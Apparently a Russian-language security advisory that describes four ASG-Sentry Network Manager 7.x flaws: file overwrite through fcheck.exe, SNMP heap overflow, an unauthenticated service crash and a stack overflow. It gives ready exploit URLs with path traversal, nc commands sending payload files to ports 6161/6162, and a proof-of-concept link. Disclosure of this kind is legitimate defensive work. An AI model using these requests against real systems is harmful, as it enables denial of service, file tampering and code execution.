Программа: ASG-Sentry Network Manager 7.x

Найденные уязвимости позволяют удаленному злоумышленнику осуществить DoS
атаку, получить доступ к файловой системе и выполнить произвольный код на
целевой системе.

1) Уязвимость возникает из-за ошибки в утилите "fcheck.exe". Атакующий может
передать специально сформированные данные, содержащие опцию "-b" в HTTP запросе,
что позволит перезаписать произвольные файлы на целевой системе.

2) Уязвимость возникает из-за ошибки в проецессе "FxAgent". Атакующий может
передать специально сформированный SNMP запрос, содержащий слишком длинную
строку community, что приведет к переполнению динамической памяти.

3) Уязвимость возникает из-за того, что команды передаваемые сервису "FxIAList"
не проходят аутентификацию. Атакующий может передать специально сформированную
команду "exit" на порт 6162/TCP, что приведет к краху сервиса.

4) Уязвимость возникает из-за ошибки в сервисе "FxIAList". Атакующий может
передать специально сформированный пакет на порт 6162/TCP, что приведет к
переполнению стека в выполнению произвольного кода.

Примеры:

http://aluigi.org/poc/asgulo.zip

1)
http://SERVER:6161/snmx-cgi/fcheck.exe?-b+..\../..\boot.ini
http://SERVER:6161/snmx-cgi/fcheck.exe?-b+c:\windows\win.ini
http://SERVER:6161/snmx-cgi/fcheck.exe?-b+c:\file.txt+c:\
http://SERVER:6161/snmx-cgi/fcheck.exe?-b+\host\document.txt
this link for the network share is correct because Apache converts
any backslash to double so that one becomes \\host\\document.txt

2)
nc SERVER 6161 -v -v -u < asgulo_fxagent.txt

3)
nc SERVER 6162 -v -v -w 1 < asgulo-ialist1.txt

4)
nc SERVER 6162 -v -v -w 1 < asgulo-ialist2.txt

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии